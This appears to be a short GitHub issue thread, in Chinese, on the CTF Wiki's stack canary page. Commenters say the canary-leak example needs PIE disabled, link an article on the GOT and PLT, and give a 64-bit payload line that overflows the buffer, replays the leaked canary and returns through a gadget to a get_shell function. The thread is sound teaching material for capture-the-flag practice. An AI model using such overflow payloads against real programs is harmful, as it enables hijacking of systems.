Open 40huo opened 5 years ago
泄露栈中的 Canary的程序在编译的时候需要关闭pie,才能成功
这个文章讲了一些关于got表与plt表的相关知识,如果你和我一样感觉到迷惑的话,可以看看这个. https://systemoverlord.com/2017/03/19/got-and-plt-for-pwning.html
ex2.c如果编译成64位的话,在泄露canary时应考虑两点:
gadget = (0x401016) # addr to ret
payload = (b'\x90'*104) + p64(canary) + (b'\x90'*8) + p64(gadget) + p64(get_shell)
https://ctf-wiki.github.io/ctf-wiki/pwn/linux/mitigation/canary-zh/
CTF Wiki